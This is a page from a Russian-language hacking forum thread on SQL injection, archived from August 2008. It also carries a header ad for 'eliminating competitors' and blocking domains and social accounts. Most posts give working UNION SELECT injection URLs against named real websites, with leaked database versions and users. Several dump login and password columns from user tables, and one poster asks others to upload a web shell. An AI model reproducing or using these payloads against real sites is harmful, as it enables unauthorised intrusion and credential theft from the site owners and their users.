Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 630 из 1242

630

Опции темы

Поиск в этой теме

Опции просмотра

#6291

12.08.2008, 21:17

BanQui

Познающий

Регистрация: 10.07.2008

Сообщений: 70

Провел на форуме:
203452

Репутация: 36

Люди посматрите пожалуйста ентот сайт http://pw.spark-games.ru/indexx.php (попрошу обратить внимание на мини чат!) Вот регистрация тоже не понятно http://pw.spark-games.ru/registration.php попробуйте зарегить новый акк есть ошибки скульные!

#6292

13.08.2008, 00:16

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

PR-6 от гарварда сайтек какой-то.

Цитата:

http://www.pluralism.org/news/article.php?id=10536

42
name

luralsm@www8.serve.com
Version:4.1.20-log
Dbname:news

#6293

13.08.2008, 02:19

t0ox

Новичок

Регистрация: 23.10.2007

Сообщений: 17

Провел на форуме:
105851

Репутация: 46

Код:

http://www.hq-video.ru/details.php?id=-999999+union+select+1,2,concat(version(),0x3a,user (),0x3a,database()),4,5/*

5.0.26
root@localhost
hqvideo

Код:

http://www.hq-video.ru/details.php?id=-999999+union+select+1,2,concat(table_schema,0x3a,t able_name,0x3a,column_name),4,5+from+information_s chema.columns/*
http://www.hq-video.ru/details.php?id=-999999+union+select+1,2,concat(table_name,0x3a,col umn_name),4,5+from+information_schema.columns/*

кто шэл зальёт опешитесь

#6294

13.08.2008, 04:36

PandoraBox

Постоянный

Регистрация: 06.05.2007

Сообщений: 393

Провел на форуме:
1510937

Репутация: 398

Отправить сообщение для PandoraBox с помощью ICQ

Код:

http://www.profvideo.ru/index.php?ids=-501+union+select+1,2,version(),concat_ws(0x3a3a,user(),database()),5,6,7,8,9,10,11,12/*

4.1.22
profvideo@localhost
profvideo

#6295

13.08.2008, 09:14

Glazz

Участник форума

Регистрация: 09.08.2008

Сообщений: 139

Провел на форуме:
560332

Репутация: 15

Цитата:

Сообщение от BanQui

Ошибки при реге , это у них SQL сервер недоступен/орублен.

#6296

13.08.2008, 10:47

Calcutta

Постоянный

Регистрация: 06.08.2007

Сообщений: 347

Провел на форуме:
2584838

Репутация: 770

Отправить сообщение для Calcutta с помощью ICQ

Интернет-магазин:
http://webkoleso.ru/index.php?pageId=-111111+union+select+1,2,3,concat_ws(0x3a,user(),ve rsion(),database()),5,6,7,8,9--
_________________________________________
edited:
http://magazine.ge/index.php?page=events&id=22+union+select+1,2,3,4,5 ,6,7,8,9--

http://svrwheels.ru/index.php?pageId=-111+union+select+1,2,3,4,5,6,7,8--

http://ihf-hr.org/documents/doc_summary.php?sec_id=1+union+select+1,concat_ws( 0x3a,version(),user(),database()),3-- <<<----с дальнейшим выводом проблемы :-/

Последний раз редактировалось Calcutta; 13.08.2008 в 12:58..

#6297

13.08.2008, 16:31

S0ulVortex

Участник форума

Регистрация: 18.11.2007

Сообщений: 184

Провел на форуме:
1686744

Репутация: 246

Отправить сообщение для S0ulVortex с помощью ICQ

Код:

http://vesnasouvenir.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://trol.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://expoland.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://vesnaboard.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://www.eva.dp.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://www.cifrotech.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://ops-print.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://vesnanaruzhka.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://vp.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://www.kominmet.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://piton.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2

Все сайты управляются отсюда
http://www.as-admin.com/index.php
Жаль такого на юкоз нету

Последний раз редактировалось S0ulVortex; 16.08.2008 в 13:50..

#6298

13.08.2008, 17:41

Xszz

Участник форума

Регистрация: 23.04.2007

Сообщений: 233

Провел на форуме:
671223

Репутация: 91

Отправить сообщение для Xszz с помощью ICQ

Воть

Цитата:

[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+INFORMATION_SCHEMA.columns/*
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+INFORMATION_SCHEMA.SCHEMATA/*
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+INFORMATION_SCHEMA.tables/*
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+users/*
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+dual/*
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+phpbb_users/*

#6299

13.08.2008, 17:50

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

Цитата:

http://www.amplemama.ca/product-details.php?prid=20%&prname=Maternity%20Office%20W ear&sprid=&sprname=&product=64+union+select+1,user name,3,password,5,6,7,8,9,10,11,12+from+login/*

amplemama@82.165.233.47
4.1.7-nt
connetik_ample

админк:
http://www.amplemama.ca/bizcura/
аплоад картинок, но..ничего больше(

#6300

13.08.2008, 18:04

Calcutta

Постоянный

Регистрация: 06.08.2007

Сообщений: 347

Провел на форуме:
2584838

Репутация: 770

http://solf.ru/main.php?p=-111+union+select+1,column_name,3+from+information_ schema.columns+where+table_name=0x7573657273+limit +0,1--
users:
-id
-username
-password
-fname
-email

http://solf.ru/main.php?p=-111+union+select+1,column_name,3+from+information_ schema.columns+where+table_name=0x7961626c6f6b6f6d 61696c+limit+1,1--
mail:
-id
-email
-name
-code

дальше кому интересно - уже сами -)

Страница 630 из 1242

630

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход